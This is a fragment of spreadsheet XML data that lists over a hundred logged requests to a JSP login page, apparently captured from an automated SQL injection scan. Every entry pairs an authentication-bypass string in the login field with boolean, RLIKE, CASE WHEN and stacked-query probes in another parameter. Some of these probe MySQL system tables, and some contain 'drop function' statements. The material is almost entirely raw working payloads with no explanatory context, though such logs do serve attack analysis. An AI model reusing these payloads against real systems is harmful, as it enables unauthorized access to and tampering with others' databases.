    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(3816=3816,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(3619=3619,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(3924=3924,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(1123=1123,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)rlikeif(7995=7995,entrar,0x28)and(5987=5987</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)rlikeif(3924=3924,entrar,0x28)and(6012=6012</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)rlikeif(7650=7650,entrar,0x28)and(3362=3362</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))rlikeif(1480=1480,entrar,0x28)and((3335=3335</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))rlikeif(3924=3924,entrar,0x28)and((9346=9346</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))rlikeif(3929=3929,entrar,0x28)and((1095=1095</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))rlikeif(5682=5682,entrar,0x28)and(((7803=7803</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))rlikeif(3924=3924,entrar,0x28)and(((33=33</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))rlikeif(5079=5079,entrar,0x28)and(((2506=2506</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarrlikeif(6981=6981,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarrlikeif(3924=3924,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarrlikeif(4410=4410,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(6844=6844,entrar,0x28)and('cdzu'='cdzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(3924=3924,entrar,0x28)and('ewsv'='ewsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(4046=4046,entrar,0x28)and('yxvq'='yxvq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))rlikeif(5906=5906,entrar,0x28)and(('mbbu'='mbbu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))rlikeif(3924=3924,entrar,0x28)and(('nbnf'='nbnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))rlikeif(538=538,entrar,0x28)and(('wbuf'='wbuf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))rlikeif(9408=9408,entrar,0x28)and((('gjvp'='gjvp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))rlikeif(3924=3924,entrar,0x28)and((('zoin'='zoin</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))rlikeif(7968=7968,entrar,0x28)and((('fexd'='fexd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(2436=2436,entrar,0x28)and'cxwi'='cxwi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(3924=3924,entrar,0x28)and'bown'='bown</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(394=394,entrar,0x28)and'cgkw'='cgkw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(1518=1518,entrar,0x28)and('jzcu'like'jzcu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(3924=3924,entrar,0x28)and('juae'like'juae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(676=676,entrar,0x28)and('mhqu'like'mhqu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))rlikeif(7653=7653,entrar,0x28)and(('sftt'like'sftt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))rlikeif(3924=3924,entrar,0x28)and(('ivtm'like'ivtm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))rlikeif(6055=6055,entrar,0x28)and(('lkaz'like'lkaz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))rlikeif(9290=9290,entrar,0x28)and((('dmfz'like'dmfz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))rlikeif(3924=3924,entrar,0x28)and((('aprf'like'aprf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))rlikeif(9083=9083,entrar,0x28)and((('jgpk'like'jgpk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(624=624,entrar,0x28)and'dsdg'like'dsdg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(3924=3924,entrar,0x28)and'jnzt'like'jnzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(7742=7742,entrar,0x28)and'nkzs'like'nkzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")rlikeif(1369=1369,entrar,0x28)and("zkyz"="zkyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")rlikeif(3924=3924,entrar,0x28)and("gkyz"="gkyz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")rlikeif(2484=2484,entrar,0x28)and("lhgk"="lhgk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))rlikeif(5998=5998,entrar,0x28)and(("emmo"="emmo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))rlikeif(3924=3924,entrar,0x28)and(("vmnf"="vmnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))rlikeif(9760=9760,entrar,0x28)and(("oqdh"="oqdh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))rlikeif(4773=4773,entrar,0x28)and((("lips"="lips</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))rlikeif(3924=3924,entrar,0x28)and((("labq"="labq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))rlikeif(1872=1872,entrar,0x28)and((("xfmh"="xfmh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(8576=8576,entrar,0x28)and"byss"="byss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(3924=3924,entrar,0x28)and"vpiw"="vpiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(8714=8714,entrar,0x28)and"phgi"="phgi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")rlikeif(8878=8878,entrar,0x28)and("hbkw"like"hbkw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")rlikeif(3924=3924,entrar,0x28)and("hbpq"like"hbpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")rlikeif(4188=4188,entrar,0x28)and("wklq"like"wklq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))rlikeif(4007=4007,entrar,0x28)and(("deoz"like"deoz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))rlikeif(3924=3924,entrar,0x28)and(("vlnz"like"vlnz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))rlikeif(7022=7022,entrar,0x28)and(("nusu"like"nusu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))rlikeif(4863=4863,entrar,0x28)and((("afip"like"afip</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))rlikeif(3924=3924,entrar,0x28)and((("nqpw"like"nqpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))rlikeif(1749=1749,entrar,0x28)and((("nnjn"like"nnjn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(8762=8762,entrar,0x28)and"wewm"like"wewm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(3924=3924,entrar,0x28)and"eyok"like"eyok</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"rlikeif(553=553,entrar,0x28)and"wiep"like"wiep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=make_set(1249=5446,entrar)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=make_set(6155=6155,entrar)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=make_set(6664=7464,entrar)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=elt(522=3699,entrar)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=elt(2142=2142,entrar)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=elt(3940=5538,entrar)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(114=2783)*entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(5711=5711)*entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(8708=5419)*entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(9380=2712)thenentrarelse9380*(select9380frominformation_schema.character_sets)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(6862=6862)thenentrarelse6862*(select6862frominformation_schema.character_sets)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(4946=6224)thenentrarelse4946*(select4946frominformation_schema.character_sets)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(8172=3700)thenentrarelse8172*(select8172frommysql.db)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(6803=6803)thenentrarelse6803*(select6803frommysql.db)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(1727=5007)thenentrarelse1727*(select1727frommysql.db)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(8125=5126)thenentrarelse8125*(select8125frominformation_schema.character_sets)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(2974=2974)thenentrarelse2974*(select2974frominformation_schema.character_sets)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(9011=4945)thenentrarelse9011*(select9011frominformation_schema.character_sets)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(9072=8672)thenentrarelse9072*(select9072frommysql.db)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(8478=8478)thenentrarelse8478*(select8478frommysql.db)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(2851=4463)thenentrarelse2851*(select2851frommysql.db)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if((4540=9518),select4540,dropfunctionleei);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if((3940=3940),select3940,dropfunctionitac);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if((9311=526),select9311,dropfunctionyulp);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((9595=3297),select9595,dropfunctionsthw);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((3940=3940),select3940,dropfunctionitac);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((4397=9750),select4397,dropfunctiontafl);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((7762=3490),select7762,dropfunctionkvhb);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((3940=3940),select3940,dropfunctionitac);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((4819=3758),select4819,dropfunctionafgv);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((6078=1746),select6078,dropfunctionqhlg);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((3940=3940),select3940,dropfunctionitac);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((4212=1730),select4212,dropfunctionagtz);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if((5079=95),select5079,dropfunctiondixz);--and(1046=1046</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if((3940=3940),select3940,dropfunctionitac);--and(1924=1924</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);if((7731=4327),select7731,dropfunctionakqa);--and(3011=3011</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));if((5261=370),select5261,dropfunctiontydj);--and((2704=2704</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));if((3940=3940),select3940,dropfunctionitac);--and((342=342</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));if((2173=7896),select2173,dropfunctionxzlr);--and((4577=4577</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));if((2989=8788),select2989,dropfunctioneljq);--and(((1861=1861</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));if((3940=3940),select3940,dropfunctionitac);--and(((7872=7872</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));if((6368=5374),select6368,dropfunctionphzd);--and(((9684=9684</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;if((8399=5315),select8399,dropfunctionaudz);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;if((3940=3940),select3940,dropfunctionitac);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;if((2272=712),select2272,dropfunctionyuge);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((7609=3000),select7609,dropfunctionkidy);--and('dmuj'='dmuj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((3940=3940),select3940,dropfunctionitac);--and('xsoi'='xsoi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((1601=9612),select1601,dropfunctionkpkq);--and('ngcn'='ngcn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if((1137=2756),select1137,dropfunctioncyad);--and(('ybfe'='ybfe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if((3940=3940),select3940,dropfunctionitac);--and(('bciv'='bciv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if((805=8234),select805,dropfunctionhzft);--and(('iqws'='iqws</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if((7316=3904),select7316,dropfunctionhyld);--and((('yrpw'='yrpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if((3940=3940),select3940,dropfunctionitac);--and((('mhzc'='mhzc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if((3304=7960),select3304,dropfunctioncogt);--and((('vmaj'='vmaj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((6618=2278),select6618,dropfunctionyznj);--and'nsps'='nsps</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((3940=3940),select3940,dropfunctionitac);--and'kpyx'='kpyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((778=6420),select778,dropfunctionyvcc);--and'stxg'='stxg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((9139=2012),select9139,dropfunctionksci);--and('zstx'like'zstx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((3940=3940),select3940,dropfunctionitac);--and('hzbe'like'hzbe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');if((3512=463),select3512,dropfunctionoaek);--and('mooq'like'mooq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if((4036=6548),select4036,dropfunctioncezy);--and(('xoez'like'xoez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if((3940=3940),select3940,dropfunctionitac);--and(('kkfe'like'kkfe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));if((7658=1090),select7658,dropfunctioniuur);--and(('ymdq'like'ymdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if((1953=314),select1953,dropfunctionyyji);--and((('ildh'like'ildh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if((3940=3940),select3940,dropfunctionitac);--and((('eqcp'like'eqcp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));if((4613=8456),select4613,dropfunctionsjaf);--and((('obwe'like'obwe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((2762=2808),select2762,dropfunctionsxdc);--and'fbqj'like'fbqj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((3940=3940),select3940,dropfunctionitac);--and'rjaw'like'rjaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';if((5548=7812),select5548,dropfunctionowgx);--and'awwp'like'awwp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if((2950=5264),select2950,dropfunctiondvbo);--and("amwr"="amwr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if((3940=3940),select3940,dropfunctionitac);--and("cxvx"="cxvx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if((4669=8519),select4669,dropfunctionyyzy);--and("nzie"="nzie</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if((2149=5737),select2149,dropfunctionjjto);--and(("uycn"="uycn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if((3940=3940),select3940,dropfunctionitac);--and(("vske"="vske</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if((345=8054),select345,dropfunctionvawj);--and(("bdxw"="bdxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if((422=72),select422,dropfunctionosii);--and((("ydbb"="ydbb</t>
  </si>
  <si>
